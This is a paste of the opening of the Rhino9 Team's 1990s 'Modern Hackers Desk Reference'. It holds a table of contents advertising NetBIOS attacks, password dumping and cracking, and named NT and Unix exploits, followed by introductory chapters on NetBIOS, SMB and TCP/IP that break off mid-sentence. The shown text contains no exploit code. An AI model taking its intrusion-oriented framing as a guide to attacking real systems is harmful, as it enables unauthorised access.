· 9 years ago · Nov 29, 2016, 02:34 AM
1
2
3
4
5The MH DeskReference
6Version 1.2
7
8Written/Assembled by
9The Rhino9 Team
10
11
12Table of Contents
13
14=Part One=
15=Essential background Knowledge=
16
17[0.0.0] Preface
18[0.0.1] The Rhino9 Team
19[0.0.2] Disclaimer
20[0.0.3] Thanks and Greets
21
22[1.0.0] Preface To NetBIOS
23[1.0.1] What is NetBIOS?
24[1.0.2] NetBIOS Names
25[1.0.3] NetBIOS Sessions
26[1.0.4] NetBIOS Datagrams
27[1.0.5] NetBEUI Explained
28[1.0.6] NetBIOS Scopes
29
30[1.2.0] Preface to SMB's
31[1.2.1] What are SMB's?
32[1.2.2] The Redirector
33
34[2.0.0] What is TCP/IP?
35[2.0.1] FTP Explained
36[2.0.2] Remote Login
37[2.0.3] Computer Mail
38[2.0.4] Network File Systems
39[2.0.5] Remote Printing
40[2.0.6] Remote Execution
41[2.0.7] Name Servers
42[2.0.8] Terminal Servers
43[2.0.9] Network-Oriented Window Systems
44[2.1.0] General description of the TCP/IP protocols
45[2.1.1] The TCP Level
46[2.1.2] The IP level
47[2.1.3] The Ethernet level
48[2.1.4] Well-Known Sockets And The Applications Layer
49[2.1.5] Other IP Protocols
50[2.1.6] Domain Name System
51[2.1.7] Routing
52[2.1.8] Subnets and Broadcasting
53[2.1.9] Datagram Fragmentation and Reassembly
54[2.2.0] Ethernet encapsulation: ARP
55
56[3.0.0] Preface to the WindowsNT Registry
57[3.0.1] What is the Registry?
58[3.0.2] In Depth Key Discussion
59[3.0.3] Understanding Hives
60[3.0.4] Default Registry Settings
61
62[4.0.0] Introduction to PPTP
63[4.0.1] PPTP and Virtual Private Networking
64[4.0.2] Standard PPTP Deployment
65[4.0.3] PPTP Clients
66[4.0.4] PPTP Architecture
67[4.0.5] Understanding PPTP Security
68[4.0.6] PPTP and the Registry
69[4.0.7] Special Security Update
70
71[5.0.0] TCP/IP Commands as Tools
72[5.0.1] The Arp Command
73[5.0.2] The Traceroute Command
74[5.0.3] The Netstat Command
75[5.0.4] The Finger Command
76[5.0.5] The Ping Command
77[5.0.6] The Nbtstat Command
78[5.0.7] The IpConfig Command
79[5.0.8] The Telnet Command
80
81[6.0.0] NT Security
82[6.0.1] The Logon Process
83[6.0.2] Security Architecture Components
84[6.0.3] Introduction to Securing an NT Box
85[6.0.4] Physical Security Considerations
86[6.0.5] Backups
87[6.0.6] Networks and Security
88[6.0.7] Restricting the Boot Process
89[6.0.8] Security Steps for an NT Operating System
90[6.0.9] Install Latest Service Pack and applicable hot-fixes
91[6.1.0] Display a Legal Notice Before Log On
92[6.1.1] Rename Administrative Accounts
93[6.1.2] Disable Guest Account
94[6.1.3] Logging Off or Locking the Workstation
95[6.1.4] Allowing Only Logged-On Users to Shut Down the Computer
96[6.1.5] Hiding the Last User Name
97[6.1.6] Restricting Anonymous network access to Registry
98[6.1.7] Restricting Anonymous network access to lookup account names and network shares
99[6.1.8] Enforcing strong user passwords
100[6.1.9] Disabling LanManager Password Hash Support
101[6.2.0] Wiping the System Page File during clean system shutdown
102[6.2.1] Protecting the Registry
103[6.2.2] Secure EventLog Viewing
104[6.2.3] Secure Print Driver Installation
105[6.2.4] The Schedule Service (AT Command)
106[6.2.5] Secure File Sharing
107[6.2.6] Auditing
108[6.2.7] Threat Action
109[6.2.8] Enabling System Auditing
110[6.2.9] Auditing Base Objects
111[6.3.0] Auditing of Privileges
112[6.3.1] Protecting Files and Directories
113[6.3.2] Services and NetBios Access From Internet
114[6.3.3] Alerter and Messenger Services
115[6.3.4] Unbind Unnecessary Services from Your Internet Adapter Cards
116[6.3.5] Enhanced Protection for Security Accounts Manager Database
117[6.3.6] Disable Caching of Logon Credentials during interactive logon.
118[6.3.7] How to secure the %systemroot%\repair\sam._ file
119[6.3.8] TCP/IP Security in NT
120[6.3.9] Well known TCP/UDP Port numbers
121
122[7.0.0] Preface to Microsoft Proxy Server
123[7.0.1] What is Microsoft Proxy Server?
124[7.0.2] Proxy Servers Security Features
125[7.0.3] Beneficial Features of Proxy
126[7.0.4] Hardware and Software Requirements
127[7.0.5] What is the LAT?
128[7.0.6] What is the LAT used for?
129[7.0.7] What changes are made when Proxy Server is installed?
130[7.0.8] Proxy Server Architecture
131[7.0.9] Proxy Server Services: An Introduction
132[7.1.0] Understanding components
133[7.1.1] ISAPI Filter
134[7.1.2] ISAPI Application
135[7.1.3] Proxy Servers Caching Mechanism
136[7.1.4] Windows Sockets
137[7.1.5] Access Control Using Proxy Server
138[7.1.6] Controlling Access by Internet Service
139[7.1.7] Controlling Access by IP, Subnet, or Domain
140[7.1.8] Controlling Access by Port
141[7.1.9] Controlling Access by Packet Type
142[7.2.0] Logging and Event Alerts
143[7.2.1] Encryption Issues
144[7.2.2] Other Benefits of Proxy Server
145[7.2.3] RAS
146[7.2.4] IPX/SPX
147[7.2.5] Firewall Strategies
148[7.2.6] Logical Construction
149[7.2.7] Exploring Firewall Types
150[7.2.3] NT Security Twigs and Ends
151
152=Part Two=
153=The Techniques of Survival=
154
155
156[8.0.0] NetBIOS Attack Methods
157[8.0.1] Comparing NAT.EXE to Microsoft's own executables
158[8.0.2] First, a look at NBTSTAT
159[8.0.3] Intro to the NET commands
160[8.0.4] Net Accounts
161[8.0.5] Net Computer
162[8.0.6] Net Config Server or Net Config Workstation
163[8.0.7] Net Continue
164[8.0.8] Net File
165[8.0.9] Net Group
166[8.1.0] Net Help
167[8.1.1] Net Helpmsg message#
168[8.1.2] Net Localgroup
169[8.1.3] Net Name
170[8.1.4] Net Pause
171[8.1.5] Net Print
172[8.1.6] Net Send
173[8.1.7] Net Session
174[8.1.8] Net Share
175[8.1.9] Net Statistics Server or Workstation
176[8.2.0] Net Stop
177[8.2.1] Net Time
178[8.2.2] Net Use
179[8.2.3] Net User
180[8.2.4] Net View
181[8.2.5] Special note on DOS and older Windows Machines
182[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack
183
184[9.0.0] Frontpage Extension Attacks
185[9.0.1] For the tech geeks, we give you an actual PWDUMP
186[9.0.2] The haccess.ctl file
187[9.0.3] Side note on using John the Ripper
188
189[10.0.0] WinGate
190[10.0.1] What Is WinGate?
191[10.0.2] Defaults After a WinGate Install
192[10.0.3] Port 23 Telnet Proxy
193[10.0.4] Port 1080 SOCKS Proxy
194[10.0.5] Port 6667 IRC Proxy
195[10.0.6] How Do I Find and Use a WinGate?
196[10.0.7] I have found a WinGate telnet proxy now what?
197[10.0.8] Securing the Proxys
198[10.0.9] mIRC 5.x WinGate Detection Script
199[10.1.0] Conclusion
200
201[11.0.0] What a security person should know about WinNT
202[11.0.1] NT Network structures (Standalone/WorkGroups/Domains)
203[11.0.2] How does the authentication of a user actually work
204[11.0.3] A word on NT Challenge and Response
205[11.0.4] Default NT user groups
206[11.0.5] Default directory permissions
207[11.0.6] Common NT accounts and passwords
208[11.0.7] How do I get the admin account name?
209[11.0.8] Accessing the password file in NT
210[11.0.9] Cracking the NT passwords
211[11.1.0] What is 'last login time'?
212[11.1.1] Ive got Guest access, can I try for Admin?
213[11.1.2] I heard that the %systemroot%\system32 was writeable?
214[11.1.3] What about spoofin DNS against NT?
215[11.1.4] What about default shared folders?
216[11.1.5] How do I get around a packet filter-based firewall?
217[11.1.6] What is NTFS?
218[11.1.7] Are there are vulnerabilities to NTFS and access controls?
219[11.1.8] How is file and directory security enforced?
220[11.1.9] Once in, how can I do all that GUI stuff?
221[11.2.0] How do I bypass the screen saver?
222[11.2.1] How can tell if its an NT box?
223[11.2.2] What exactly does the NetBios Auditing Tool do?
224
225
226[12.0.0] Cisco Routers and their configuration
227[12.0.1] User Interface Commands
228[12.0.2] disable
229[12.0.3] editing
230[12.0.4] enable
231[12.0.5] end
232[12.0.6] exit
233[12.0.7] full-help
234[12.0.8] help
235[12.0.9] history
236[12.1.0] ip http access-class
237[12.1.1] ip http port
238[12.1.2] ip http server
239[12.1.3] menu (EXEC)
240[12.1.4] menu (global)
241[12.1.5] menu command
242[12.1.6] menu text
243[12.1.7] menu title
244[12.1.8] show history
245[12.1.9] terminal editing
246[12.2.0] terminal full-help (EXEC)
247[12.2.1] terminal history
248[12.2.2] Network Access Security Commands
249[12.2.3] aaa authentication arap
250[12.2.4] aaa authentication enable default
251[12.2.5] aaa authentication local-override
252[12.2.6] aaa authentication login
253[12.2.7] aaa authentication nasi
254[12.2.8] aaa authentication password-prompt
255[12.2.9] aaa authentication ppp
256[12.3.0] aaa authentication username-prompt
257[12.3.1] aaa authorization
258[12.3.2] aaa authorization config-commands
259[12.3.3] aaa new-model
260[12.3.4] arap authentication
261[12.3.5] clear kerberos creds
262[12.3.6] enable last-resort
263[12.3.7] enable use-tacacs
264[12.3.8] ip radius source-interface
265[12.3.9] ip tacacs source-interface
266[12.4.0] kerberos clients mandatory
267[12.4.1] kerberos credentials forward
268[12.4.2] kerberos instance map
269[12.4.3] kerberos local-realm
270[12.4.4] kerberos preauth
271[12.4.5] kerberos realm
272[12.4.6] kerberos server
273[12.4.7] kerberos srvtab entry
274[12.4.8] kerberos srvtab remote
275[12.4.9] key config-key
276[12.5.0] login tacacs
277[12.5.1] nasi authentication
278[12.5.2] ppp authentication
279[12.5.3] ppp chap hostname
280[12.5.4] ppp chap password
281[12.5.5] ppp pap sent-username
282[12.5.6] ppp use-tacacs
283[12.5.7] radius-server dead-time
284[12.5.8] radius-server host
285[12.5.9] radius-server key
286[12.6.0] radius-server retransmit
287[12.6.1] show kerberos creds
288[12.6.2] show privilege
289[12.6.3] tacacs-server key
290[12.6.4] tacacs-server login-timeout
291[12.6.5] tacacs-server authenticate
292[12.6.6] tacacs-server directed-request
293[12.6.7] tacacs-server key
294[12.6.8] tacacs-server last-resort
295[12.6.9] tacacs-server notify
296[12.7.0] tacacs-server optional-passwords
297[12.7.1] tacacs-server retransmit
298[12.7.2] tacacs-server timeout
299[12.7.3] Traffic Filter Commands
300[12.7.4] access-enable
301[12.7.5] access-template
302[12.7.6] clear access-template
303[12.7.7] show ip accounting
304[12.7.8] Terminal Access Security Commands
305[12.7.9] enable password
306[12.8.0] enable secret
307[12.8.1] ip identd
308[12.8.2] login authentication
309[12.8.3] privilege level (global)
310[12.8.4] privilege level (line)
311[12.8.5] service password-encryption
312[12.8.6] show privilege
313[12.8.7] username
314[12.8.8] A Word on Ascend Routers
315
316[13.0.0] Known NT/95/IE Holes
317[13.0.1] WINS port 84
318[13.0.2] WindowsNT and SNMP
319[13.0.3] Frontpage98 and Unix
320[13.0.4] TCP/IP Flooding with Smurf
321[13.0.5] SLMail Security Problem
322[13.0.6] IE 4.0 and DHTML
323[13.0.7] 2 NT Registry Risks
324[13.0.8] Wingate Proxy Server
325[13.0.9] O'Reilly Website uploader Hole
326[13.1.0] Exchange 5.0 Password Caching
327[13.1.1] Crashing NT using NTFS
328[13.1.2] The GetAdmin Exploit
329[13.1.3] Squid Proxy Server Hole
330[13.1.4] Internet Information Server DoS attack
331[13.1.5] Ping Of Death II
332[13.1.6] NT Server's DNS DoS Attack
333[13.1.7] Index Server Exposes Sensitive Material
334[13.1.8] The Out Of Band (OOB) Attack
335[13.1.9] SMB Downgrade Attack
336[13.2.0] RedButton
337[13.2.1] FrontPage WebBot Holes
338[13.2.2] IE and NTLM Authentication
339[13.2.3] Run Local Commands with IE
340[13.2.4] IE can launch remote apps
341[13.2.5] Password Grabbing Trojans
342[13.2.6] Reverting an ISAPI Script
343[13.2.7] Rollback.exe
344[13.2.8] Replacing System .dll's
345[13.2.9] Renaming Executables
346[13.3.0] Viewing ASP Scripts
347[13.3.1] .BAT and .CMD Attacks
348[13.3.2] IIS /..\.. Problem
349[13.3.3] Truncated Files
350[13.3.4] SNA Holes
351[13.3.5] SYN Flooding
352[13.3.6] Land Attack
353[13.3.7] Teardrop
354[13.3.8] Pentium Bug
355
356[14.0.0] VAX/VMS Makes a comeback (expired user exploit)
357[14.0.1] Step 1
358[14.0.2] Step 2
359[14.0.3] Step 3
360[14.0.4] Note
361
362[15.0.0] Linux security 101
363[15.0.1] Step 1
364[15.0.2] Step 2
365[15.0.3] Step 3
366[15.0.4] Step 4
367[15.0.5] Step 5
368[15.0.6] Step 6
369
370[16.0.0] Unix Techniques. New and Old.
371[16.0.1] ShowMount Technique
372[16.0.2] DEFINITIONS
373[16.0.3] COMPARISION TO THE MICROSOFT WINDOWD FILESHARING
374[16.0.4] SMBXPL.C
375[16.0.5] Basic Unix Commands
376[16.0.6] Special Chracters in Unix
377[16.0.7] File Permissions Etc..
378[16.0.8] STATD EXPLOIT TECHNIQUE
379[16.0.9] System Probing
380[16.1.0] Port scanning
381[16.1.1] rusers and finger command
382[16.1.2] Mental Hacking, once you know a username
383
384[17.0.0] Making a DDI from a Motorola Brick phone
385
386[18.0.0] Pager Programmer
387
388[19.0.0] The End
389
390==============Part One==============
391===================Needed Background Knowledge===================
392
393This ones for you Kevin… May the Condor fly once more…
394
395[0.0.0] Preface
396
397This book was written/compiled by The Rhino9 Team as a document for the modern hacker. We
398chose to call it the Modern Hackers Desk Reference because it mostly deals with Networking
399Technologies and Windows NT issues. Which, as everyone knows, is a must knowledge these
400days. Well, rhino9, as the premiere NT Security source, we have continually given to the security
401community freely. We continue this tradition now with this extremely useful book. This book
402covers WindowsNT security issues, Unix, Linux, Irix, Vax, Router configuration, Frontpage,
403Wingate and much much more.
404
405[0.0.1] The Rhino9 Team
406
407At the time of release, the rhino9 team is:
408
409NeonSurge (neonsurge@hotmail.com) [Security/Technical Research/Senior Member]
410Chameleon (chameleon@pemail.com) [Security/Software Developer/Senior Member]
411Vacuum (vacuum@technotronic.com) [Security/Software Research/Senior Member]
412Rute (banshee@evil-empire.com) [Security/Software Developer/Code Guru]
413Syndicate (syndicate@pemail.com) [Security/HTML Operations/Senior Member]
414The090000 (090000@intercore.com.ar) [Security]
415DemonBytez (root@cybrids.org) [Security]
416NetJammer (netjammer@x-treme.org) [Security]
417
418[0.0.2] Disclaimer
419
420This text document is released FREE of charge to EVERYONE. The rhino9 team made NO
421profits from this text. This text is NOT meant for re-sale, or for trade for any other type of material
422or monetary possesions. This text is given freely to the Internet community. The authors of this
423text do not take responsibility for damages incurred during the practice of any of the information
424contained within this text document.
425
426[0.0.3] Thanks and Greets
427
428Extra special greetings and serious mad ass props to NeonSurge’s fiance SisterMoon, and
429Chameleon’s woman, Jayde. Special thanks to the people at ntsecurity.net. Special thanks to
430Simple Nomad for releasing the NT HACK FAQ which was used in the making of this document.
431Thanks to Cisco Systems for making such superior equipment. Thanks to the guy from Lucent
432Technologies, whose text file was used during one of the NT Security sections (if you see this,
433contact me so I can give you proper credit). Special props go out to Virtual of Cybrids for his
434information on CellPhones and Pagers. Special props to Phreak-0 for his Unix contributions. Mad
435props to Hellmaster for the Vax info. Thanks to Rloxley and the rest of X-Treme for helping with
436the distribution and advertising of this document. Thanks to Merlin45 for being the marketing pimp
437that he is. Special thanks to InterCore for the unix information. Greetings to Cybrids, Intercore, X-
438Treme, L0pht, CodeZero (grins), 2600 Magazine (thanks for your vigilance on the Mitnick case).
439
440
441[1.0.0] Preface to NetBIOS
442
443Before you begin reading this section, understand that this section was written for the novice to
444the concept of NetBIOS, but - it also contains information the veteran might find educational. I am
445prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so
446basic?" - Simple, its written for people that may be coming from an enviroment that does not use
447NetBIOS, so they would need me to start with basics, thanks.
448
449[1.0.1] Whats is NetBIOS?
450
451NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an
452Application Programming Interface (API) for client software to access LAN resources. Since its
453creation, NetBIOS has become the basis for many other networking applications. In its strictest
454sense, NetBIOS is an interface specification for acessing networking services.
455
456NetBIOS, a layer of software developed to link a network operating system with specific
457hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS
458has now been extended to allow programs written using the NetBIOS interface to operate on the
459IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it
460is common to refer to NetBIOS-compatible LANs.
461
462It offers network applications a set of "hooks" to carry out inter-application communication and
463data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is
464to isolate application programs from any type of hardware dependancies. It also spares software
465developers the task of developing network error recovery and low level message addressing or
466routing. The use of the NetBIOS interface does alot of this work for them.
467
468NetBIOS standardizes the interface between applications and a LANs operating capabilities. With
469this, it can be specified to which levels of the OSI model the application can write to, making the
470application transportable to other networks. In a NetBIOS LAN enviroment, computers are known
471on the system by a name. Each computer on the network has a permanent name that is
472programmed in various different ways. These names will be discussed in more detail below.
473
474PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS
475datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error
476detection and correction. The communication is on a one-to-one basis. Datagram and broadcast
477methods allow one computer to communicate with several other computers at the same time, but
478are limited in message size. There is no error detection or correction using these datagram or
479broadcast methods. However, datagram communication allows for communication without having
480to establish a session.
481
482All communication in these enviroments are presented to NetBIOS in a format called Network
483Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user
484program. These NCB's are divided into fields, these are reserved for input and output
485respectively.
486
487NetBIOS is a very common protocol used in todays enviroments. NetBIOS is supported on
488Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an
489interface between the application and the network adapter. Since then, transport like functions
490have been added to NetBIOS, making it more functional over time.
491
492In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both
493supported. It supports both broadcasts and multicasting and supports three distinct services:
494Naming, Session, and Datagram.
495
496[1.0.2] NetBIOS Names
497
498NetBIOS names are used to identify resources on a network. Applications use these names to
499start and end sessions. You can configure a single machine with multiple applications, each of
500which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS
501station name that is user defined or that NetBIOS derives by internal means.
502
503NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must
504be unique within the entire source routing network. Before a PC that uses NetBIOS can fully
505function on a network, that PC must register their NetBIOS name.
506
507When a client becomes active, the client advertises their name. A client is considered to be
508registered when it can successfully advertise itself without any other client claiming it has the
509same name. The steps of the registration process is as follows:
510
5111. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to
512ensure every other client on the network receives the information.
513
5142. If another client on the network already has the name, that NetBIOS client issues its own
515broadcast to indicate that the name is in use. The client who is trying to register the already in use
516name, stop all attempts to register that name.
517
5183. If no other client on the network objects to the name registration, the client will finish the
519registration process.
520
521There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must
522be unique across the network. A group name does not have to be unique and all processes that
523have a given group name belong to the group. Each NetBIOS node maintains a table of all
524names currently owned by that node.
525
526The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft,
527however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A
528NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or
529the registered device or service.
530
531[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports
532137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is
533NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website
534listed above]
535
536The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These
537suffixes are displayed in hexadecimal format.
538
539Name Number Type Usage
540=========================================================================
541=
542<computername> 00 U Workstation Service
543<computername> 01 U Messenger Service
544<\\_MSBROWSE_> 01 G Master Browser
545<computername> 03 U Messenger Service
546<computername> 06 U RAS Server Service
547<computername> 1F U NetDDE Service
548<computername> 20 U File Server Service
549<computername> 21 U RAS Client Service
550<computername> 22 U Exchange Interchange
551<computername> 23 U Exchange Store
552<computername> 24 U Exchange Directory
553<computername> 30 U Modem Sharing Server Service
554<computername> 31 U Modem Sharing Client Service
555<computername> 43 U SMS Client Remote Control
556<computername> 44 U SMS Admin Remote Control Tool
557<computername> 45 U SMS Client Remote Chat
558<computername> 46 U SMS Client Remote Transfer
559<computername> 4C U DEC Pathworks TCPIP Service
560<computername> 52 U DEC Pathworks TCPIP Service
561<computername> 87 U Exchange MTA
562<computername> 6A U Exchange IMC
563<computername> BE U Network Monitor Agent
564<computername> BF U Network Monitor Apps
565<username> 03 U Messenger Service
566<domain> 00 G Domain Name
567<domain> 1B U Domain Master Browser
568<domain> 1C G Domain Controllers
569<domain> 1D U Master Browser
570<domain> 1E G Browser Service Elections
571<INet~Services> 1C G Internet Information Server
572<IS~Computer_name> 00 U Internet Information Server
573<computername> [2B] U Lotus Notes Server
574IRISMULTICAST [2F] G Lotus Notes
575IRISNAMESERVER [33] G Lotus Notes
576Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
577
578Unique (U): The name may have only one IP address assigned to it. On a network device,
579multiple occurences of a single name may appear to be registered, but the suffix will be unique,
580making the entire name unique.
581
582Group (G): A normal group; the single name may exist with many IP addresses.
583
584Multihomed (M): The name is unique, but due to multiple network interfaces on the same
585computer, this configuration is necessary to permit the registration. Maximum number of
586addresses is 25.
587
588Internet Group (I): This is a special configuration of the group name used to manage WinNT
589domain names.
590
591Domain Name (D): New in NT 4.0
592
593For a quick and dirty look at a servers registered NetBIOS names and services, issue the
594following NBTSTAT command:
595
596nbtstat -A [ipaddress]
597nbtstat –a [host]
598
599[1.0.3] NetBIOS Sessions
600
601The NetBIOS session service provides a connection-oriented, reliable, full-duplex message
602service to a user process. NetBIOS requires one process to be the client and the other to be the
603server. NetBIOS session establishment requires a preordained cooperation between the two
604stations. One application must have issued a Listen command when another application issues a
605Call command. The Listen command references a name in its NetBIOS name table (or WINS
606server), and also the remote name an application must use to qualify as a session partner. If the
607receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful,
608each application receives notification of session establishment with the session-id. The Send and
609Receive commands the transfer data. At the end of a session, either application can issue a
610Hang-Up command. There is no real flow control for the session service because it is assumed a
611LAN is fast enough to carry the required traffic.
612
613[1.0.4] NetBIOS Datagrams
614
615Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the
616entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and
617unreliable. The Send_Datagram command requires the caller to specify the name of the
618destination. If the destination is a group name, then every member of the group receives the
619datagram. The caller of the Receive_Datagram command must specify the local name for which it
620wants to receive datagrams. The Receive_Datagram command also returns the name of the
621sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no
622Receive_Datagram commands pending, then the datagram is discarded.
623
624The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the
625local network. When a broadcast datagram is received by a NetBIOS node, every process that
626has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these
627commands are outstanding when the broadcast datagram is received, the datagram is discarded.
628
629NetBIOS enables an application to establish a session with another device and lets the network
630redirector and transaction protocols pass a request to and from another machine. NetBIOS does
631not actually manipulate the data. The NetBIOS specification defines an interface to the network
632protocol used to reach those services, not the protocol itself. Historically, has been paired with a
633network protocol called NetBEUI (network extended user interface). The association of the
634interface and the protocol has sometimes caused confusion, but the two are different.
635
636Network protocols always provide at least one method for locating and connecting to a particular
637service on a network. This is usually accomplished by converting a node or service name to a
638network address (name resolution). NetBIOS service names must be resolved to an IP address
639before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP
640accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft
641enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
642
643[1.0.5] NetBEUI Explained
644
645NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It
646formalizes the transport frame that was never standardized in NetBIOS and adds additional
647functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI
648implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface
649designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their
650networking products. It specifies the way that higher level software sends and receives messages
651over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol
652layer.
653
654[1.0.6] NetBIOS Scopes
655
656A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known
657as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a
658single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a
659character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts
660must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows
661computers to use the same computer namee as they have different scope IDs. The Scope ID
662becomes a part of the NetBIOS name, making the name unique.
663
664[1.2.0] Preface to SMB’s
665
666The reason I decided to write this section was because recently the rhino9 team has been giving
667speeches and lectures. The two questions we most frequently come across is "What is
668NetBIOS?" and "What are SMBs?". Well I hope I have already answered the NetBIOS question
669with the section above. This particular section is being written to better help people understand
670SMB's.
671
672[1.2.1] What are SMB's?
673
674Server Message Blocks are a type of "messaging protocol" that LAN Manager (and NT) clients
675and servers use to communicate with each other. SMB's are a higher level protocol that can be
676transported over NetBEUI, NetBIOS over IPX, and NetBIOS over TCP/IP (or NBT).
677
678SMBs are used by Windows 3.X, Win95, WintNT and OS/2. When it comes to security and the
679compromise of security on an NT network, the one thing to remember about SMBs is that it
680allows for remote access to shared directories, the registry, and other system services, making it
681a deadly protocol in the eyes of security conscience people.
682
683The SMB protocol was originally developed by IBM, and then jointly developed by Microsoft and
684IBM. Network requests that are sent using SMB's are encoded as Network Control Blocks (NCB)
685data structures. The NCB data structures are encoded in SMB format for transmission across the
686network. SMB is used in many Microsoft and IBM networking software:
687
688? MS-Net
689? IBM PC Network
690? IBM LAN Server
691? MS LAN Manager
692? LAN Manager for Unix
693? DEC Pathworks
694? MS Windows for Workgroups
695? Ungermann-Bass Net/1
696? NT Networks through support for LAN Manager
697
698SMB Messages can be categorized into four types:
699
700Session Control: Used to establish or discontinue Redirector connections with a remote network
701resource such as a directory or printer. (The redirector is explained below)
702
703File: Used to access and manipulate file system resources on the remote computer.
704
705Printer: Used by the Redirector to send print data to a remote printer or queue, and to obtain the
706status of remote print devices.
707
708Message: Used by applications and system components to send unicast or broadcast messages.
709
710[1.2.2] The Redirector
711
712The Redirector is the component that enables a client computer to gain access to resources on
713another computer as if the remote resources were local to the client computer. The Redirector
714communicates with other computers using the protocol stack.
715
716The Redirectors primary function is to format remote requests so that they can be understood by
717a remote station (such as a file server) and send them on their way through the network.
718
719The Redirector uses the Server Message Block (SMB) structure as the standard vehicle for
720sending these requests. The SMB is also the vehicle by which stations return responses to
721Redirector requests.
722
723Each SMB contains a header consisting of the command code (which specifies the task that the
724redirector wants the remote station to perform) and several environment and parameter fields
725(which specify how the command should be carried out).
726
727In addition to the header, the last field in the SMB may contain up to 64K of data to be sent to the
728remote station.
729
730[2.0.0] What is TCP/IP?
731
732TCP/IP is a set of protocols developed to allow cooperating computers to share resources across
733a network. It was developed by a community of researchers centered around the ARPAnet
734(Advanced Research Projects Agency). Certainly the ARPAnet is the best-known TCP/IP
735network. However as of June, 87, at least 130 different vendors had products that support
736TCP/IP, and thousands of networks of all kinds use it.
737
738First some basic definitions. The most accurate name for the set of protocols we are describing is
739the "Internet protocol suite". TCP and IP are two of the protocols in this suite. (They will be
740described below.) Because TCP and IP are the best known of the protocols, it has become
741common to use the term TCP/IP to refer to the whole family.
742
743The Internet is a collection of networks, including the Arpanet, NSFnet, regional networks such as
744NYsernet, local networks at a number of University and research institutions, and a number of
745military networks and a growing number of private corporation owned networks. The term
746"Internet" applies to this entire set of networks. The subset of them that is managed by the
747Department of Defense is referred to as the "DDN" (Defense Data Network). This includes some
748research-oriented networks, such as the Arpanet, as well as more strictly military ones. All of
749these networks are connected to each other. Users can send messages from any of them to any
750other, except where there are security or other policy restrictions on access.
751
752Officially speaking, the Internet protocol documents are simply standards adopted by the Internet
753community for its own use. More recently, the Department of Defense issued a MILSPEC
754definition of
755TCP/IP. This was intended to be a more formal definition, appropriate for use in purchasing
756specifications. However most of the TCP/IP community continues to use the Internet standards.
757The MILSPEC version is intended to be consistent with it.
758
759Whatever it is called, TCP/IP is a family of protocols. A few provide "low-level" functions needed
760for many applications. These include IP, TCP, and UDP. (These will be described in a bit more
761detail later.)
762Others are protocols for doing specific tasks, e.g. transferring files between computers, sending
763mail, or finding out who is logged in on another computer. Initially TCP/IP was used mostly
764between
765minicomputers or mainframes. These machines had their own disks, and generally were self-
766contained. Thus the most important "traditional" TCP/IP services are:
767
768[2.0.1] File Transfer
769 The file transfer protocol (FTP) allows a user on any computer
770to get files from another computer, or to send files to another
771computer. Security is handled by requiring the user to specify a user
772name and password for the other computer, or logging into a system that
773allows for Anonymous logins. Provisions are made for
774handling file transfer between machines with different character set,
775end of line conventions, etc. This is not quite the same thing as more
776recent "network file system" or "NetBIOS" protocols, which will be
777described below. Rather, FTP is a utility that you run any time you
778want to access a file on another system. You use it to copy the file
779to your own system. You then work with the local copy. (See RFC 959
780for specifications for FTP.)
781
782[2.0.2] Remote Login
783 The network terminal protocol (TELNET) allows a user to log in
784on any other computer on the network. You start a remote session by
785specifying a computer to connect to. From that time until you finish
786the session, anything you type is sent to the other computer. Note
787that you are really still talking to your own computer. But the telnet
788program effectively makes your computer invisible while it is
789running. Every character you type is sent directly to the other
790system. Generally, the connection to the remote computer behaves much
791like a dialup connection. That is, the remote system will ask you to
792log in and give a password, in whatever manner it would normally ask a
793user who had just dialed it up. When you log off of the other
794computer, the telnet program exits, and you will find yourself talking
795to your own computer. Microcomputer implementations of telnet
796generally include a terminal emulator for some common type of
797terminal. (See RFC's 854 and 855 for specifications for telnet. By the
798way, the telnet protocol should not be confused with Telenet, a vendor
799of commercial network services.)
800
801[2.0.3] Computer Mail
802 This allows you to send messages to users on other
803computers. Originally, people tended to use only one or two specific
804computers. They would maintain "mail files" on those machines. The
805computer mail system is simply a way for you to add a message to
806another user's mail file. There are some problems with this in an
807environment where microcomputers are used. The most serious is that a
808micro is not well suited to receive computer mail. When you send mail,
809the mail software expects to be able to open a connection to the
810addressee's computer, in order to send the mail. If this is a
